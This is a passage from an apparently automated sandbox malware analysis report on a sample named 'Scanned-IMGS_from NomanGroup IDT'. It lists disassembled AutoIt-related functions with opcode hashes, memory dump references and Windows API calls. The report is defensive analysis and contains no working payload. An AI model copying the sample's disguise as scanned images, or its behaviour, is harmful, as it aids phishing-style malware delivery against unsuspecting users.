                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                • Instruction ID: c8863cd2f663eb224dd507b8df78637a8e69d5ccd62825792d97a74b30f427c6
                                                                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                • Instruction Fuzzy Hash: B15155B160C60596EB346669C8497FF27898B02304F98C91BD98EC7382C60DDE02C39F
                                                                                Function 004C2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0&R
                                                                                • API String ID: 0-2643562366
                                                                                • Opcode ID: b9755088737084218ffa247947b79c01f704498ec848a218b197dba007841f61
                                                                                • Instruction ID: 162542fd9920640220d2f62b1729e70b37e3493b265007cf05ecb3de5b0b3517
                                                                                • Opcode Fuzzy Hash: b9755088737084218ffa247947b79c01f704498ec848a218b197dba007841f61
                                                                                • Instruction Fuzzy Hash: 0621D5326206118BD728CE7AC92367A73E5AB64310F14862FE4A7C37D0DE79A904DB84
                                                                                Function 00486DD9 Relevance: .6, Instructions: 637COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e481f188fa4d5914befb2c10dec377dc67388b4f6111ef6c668b6d51554f6cd
                                                                                • Instruction ID: 32d511af3a033c0dac44003ffc30aaf2a6a18bcc469e20c37ee525a73dd2522f
                                                                                • Opcode Fuzzy Hash: 5e481f188fa4d5914befb2c10dec377dc67388b4f6111ef6c668b6d51554f6cd
                                                                                • Instruction Fuzzy Hash: A9321821D29F014DD723A634C93233AA649AFB73C5F25D737E815B5EA5EB69C4C38204
                                                                                Function 0046CC39 Relevance: .6, Instructions: 635COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cee5b69e1a4612365e8699a8ea661a7f0b4ba5712a72660721a5278cb33754a3
                                                                                • Instruction ID: 92a61f670a4e173b30ce44cf73e8628fc4b21fd04f1012af3fda995fca16f242
                                                                                • Opcode Fuzzy Hash: cee5b69e1a4612365e8699a8ea661a7f0b4ba5712a72660721a5278cb33754a3
                                                                                • Instruction Fuzzy Hash: 3E322871A001158BDF64CF2DC4D06BE77A1EB67310F28816BD49A8B391E23CDD82DB5A
                                                                                Function 00457920 Relevance: .6, Instructions: 563COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e276dd8bb3d1505dd9a705f437f19a20144f52b2b94be99ef7e7e90cb502be6c
                                                                                • Instruction ID: fc70af1776c14a57baaef0b6c5301edf9ce4c9e18e981ba153c70ad8b2f8bb88
                                                                                • Opcode Fuzzy Hash: e276dd8bb3d1505dd9a705f437f19a20144f52b2b94be99ef7e7e90cb502be6c
                                                                                • Instruction Fuzzy Hash: D922D2B0A00609DFDF14CF65D941AAEB7F1FF44304F20453AE816A7292E73AAD19CB59
                                                                                Function 004591C0 Relevance: .5, Instructions: 475COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ff63660cf8badddd273aa12d79fd15d731595fffbe839485b50ba9aa5906e1b1
                                                                                • Instruction ID: dc9fa1e866c4c154de479cfa947fc2aef93676aed21a66402e26f3697e1d5790
                                                                                • Opcode Fuzzy Hash: ff63660cf8badddd273aa12d79fd15d731595fffbe839485b50ba9aa5906e1b1
                                                                                • Instruction Fuzzy Hash: 3202D7B0E00105EBCF04DF55D881AAEBBB1FF44304F10856AE8569B391E739EE15CB99
                                                                                Function 00471C77 Relevance: .3, Instructions: 254COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction ID: b0d57244c041d6103903de4bff69845e21772627e7babb274d1ef9a53eb6e396
                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction Fuzzy Hash: 7B91B8721080A34EDB39423E85340BFFFE15A523A131A479FD4FACA2E1FE18D955D624
                                                                                Function 004719B0 Relevance: .2, Instructions: 240COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction ID: 9a681ca2cb3c5d3946c34c14fade14d552293749611c48578645818f245ca216
                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction Fuzzy Hash: C591A7722090A30EDB29427D85740BFFFE14A923A1319879FD4FACA2E1FD18D655D624
                                                                                Function 00477A4A Relevance: .2, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 979cbf969df898c1c09f0f9d30af45ed980a5760caf275e7b6e8efecf2c6a8d7
                                                                                • Instruction ID: 8b4d60d3b533615589cd3e21cf6b4189ffc9ca26a78c728d7a12dd783ad6b1c0
                                                                                • Opcode Fuzzy Hash: 979cbf969df898c1c09f0f9d30af45ed980a5760caf275e7b6e8efecf2c6a8d7
                                                                                • Instruction Fuzzy Hash: ED61587124870596EA349A288995BFF3394DF41308FD0C91FE94ECB382D51DAE42C75E
                                                                                Function 00477CA7 Relevance: .2, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 38ccf875226729d7aaa7951bc1995f7b1d1a74edd6d49c6c038d25c1797ab736
                                                                                • Instruction ID: 9b5da4c3ea2a8aa136ab56f4591a2d82de1cba9d217556af96e5f80566c9ed06
                                                                                • Opcode Fuzzy Hash: 38ccf875226729d7aaa7951bc1995f7b1d1a74edd6d49c6c038d25c1797ab736
                                                                                • Instruction Fuzzy Hash: C4619A7124870962DA384A685895BFF23899F42748FD0CC5FE94ECB381E61E9D42C35E
                                                                                Function 00471706 Relevance: .2, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction ID: 2f4c76082f05d94f110613cfda6e90d6a867d0ac66fb809a259581a229a4a780
                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction Fuzzy Hash: E981A9B25080A309DB2D423D85740BFFFE15A923A131A479FD4FACB2E1EE18C559D625
                                                                                Function 004D2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 004D2B30
                                                                                • DeleteObject.GDI32(00000000), ref: 004D2B43
                                                                                • DestroyWindow.USER32 ref: 004D2B52
                                                                                • GetDesktopWindow.USER32 ref: 004D2B6D
                                                                                • GetWindowRect.USER32(00000000), ref: 004D2B74
                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 004D2CA3
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004D2CB1
                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2CF8
                                                                                • GetClientRect.USER32(00000000,?), ref: 004D2D04
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004D2D40
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2D62
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2D75
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2D80
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004D2D89
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2D98
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004D2DA1
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2DA8
                                                                                • GlobalFree.KERNEL32(00000000), ref: 004D2DB3
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2DC5
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004EFC38,00000000), ref: 004D2DDB
                                                                                • GlobalFree.KERNEL32(00000000), ref: 004D2DEB
                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 004D2E11
                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 004D2E30
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2E52
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D303F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: 958c8cf6c0a409aa28fb1cd5e20a2b07aa598db56f17b30d51e996182e6b84d4
                                                                                • Instruction ID: 17a6486f4471d2d702e20f0c67d2cbeb3a8b0ba58306d3f7e5ba75dddb9691a6
                                                                                • Opcode Fuzzy Hash: 958c8cf6c0a409aa28fb1cd5e20a2b07aa598db56f17b30d51e996182e6b84d4
                                                                                • Instruction Fuzzy Hash: 5E02CF71500208AFDB14CF64CD88EAF7BB9FF59315F00855AF915AB2A1DB74AD02CB68
                                                                                Function 004E70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004E712F
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004E7160
                                                                                • GetSysColor.USER32(0000000F), ref: 004E716C
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 004E7186
                                                                                • SelectObject.GDI32(?,?), ref: 004E7195
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004E71C0
                                                                                • GetSysColor.USER32(00000010), ref: 004E71C8
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004E71CF
                                                                                • FrameRect.USER32(?,?,00000000), ref: 004E71DE
                                                                                • DeleteObject.GDI32(00000000), ref: 004E71E5
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 004E7230
                                                                                • FillRect.USER32(?,?,?), ref: 004E7262
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E7284
                                                                                  • Part of subcall function 004E73E8: GetSysColor.USER32(00000012), ref: 004E7421
                                                                                  • Part of subcall function 004E73E8: SetTextColor.GDI32(?,?), ref: 004E7425
                                                                                  • Part of subcall function 004E73E8: GetSysColorBrush.USER32(0000000F), ref: 004E743B
                                                                                  • Part of subcall function 004E73E8: GetSysColor.USER32(0000000F), ref: 004E7446
                                                                                  • Part of subcall function 004E73E8: GetSysColor.USER32(00000011), ref: 004E7463
                                                                                  • Part of subcall function 004E73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004E7471
                                                                                  • Part of subcall function 004E73E8: SelectObject.GDI32(?,00000000), ref: 004E7482
                                                                                  • Part of subcall function 004E73E8: SetBkColor.GDI32(?,00000000), ref: 004E748B
                                                                                  • Part of subcall function 004E73E8: SelectObject.GDI32(?,?), ref: 004E7498
                                                                                  • Part of subcall function 004E73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004E74B7
                                                                                  • Part of subcall function 004E73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004E74CE
                                                                                  • Part of subcall function 004E73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004E74DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                • String ID:
                                                                                • API String ID: 4124339563-0
                                                                                • Opcode ID: 00bf3dd7f6157bf3006f5fff89b84d2734a0ee973f7a83fb63a4307aee9160b8
                                                                                • Instruction ID: 57c1f21863b6beb65751bba55ca3325a1cfa0b06b2de23a6965cb2f5b671a61f
                                                                                • Opcode Fuzzy Hash: 00bf3dd7f6157bf3006f5fff89b84d2734a0ee973f7a83fb63a4307aee9160b8
                                                                                • Instruction Fuzzy Hash: A3A1A371008351BFD7009F60DC88A6BBBA9FF49331F100A29FA629A1E2D735D946DF56
                                                                                Function 00468D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 00468E14
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 004A6AC5
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 004A6AFE
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004A6F43
                                                                                  • Part of subcall function 00468F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00468BE8,?,00000000,?,?,?,?,00468BBA,00000000,?), ref: 00468FC5
                                                                                • SendMessageW.USER32(?,00001053), ref: 004A6F7F
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 004A6F96
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 004A6FAC
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 004A6FB7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 2760611726-4108050209
                                                                                • Opcode ID: e47248e5b691411381ffcd42e94a2119a6324886eb6851ee78e3dc67da2b0789
                                                                                • Instruction ID: 9765572e8efea4ba28adc4620e72fd59b20c25bb3f8f7eb99513e97f0d6f0944
                                                                                • Opcode Fuzzy Hash: e47248e5b691411381ffcd42e94a2119a6324886eb6851ee78e3dc67da2b0789
                                                                                • Instruction Fuzzy Hash: B512BE30200651DFD725CF24C884BA7B7E5FF6A300F19456EF485CB261DB3AA892DB5A
                                                                                Function 004D2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000), ref: 004D273E
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004D286A
                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004D28A9
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004D28B9
                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 004D2900
                                                                                • GetClientRect.USER32(00000000,?), ref: 004D290C
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 004D2955
                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004D2964
                                                                                • GetStockObject.GDI32(00000011), ref: 004D2974
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004D2978
                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 004D2988
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D2991
                                                                                • DeleteDC.GDI32(00000000), ref: 004D299A
                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004D29C6
                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 004D29DD
                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 004D2A1D
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004D2A31
                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 004D2A42
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 004D2A77
                                                                                • GetStockObject.GDI32(00000011), ref: 004D2A82
                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004D2A8D
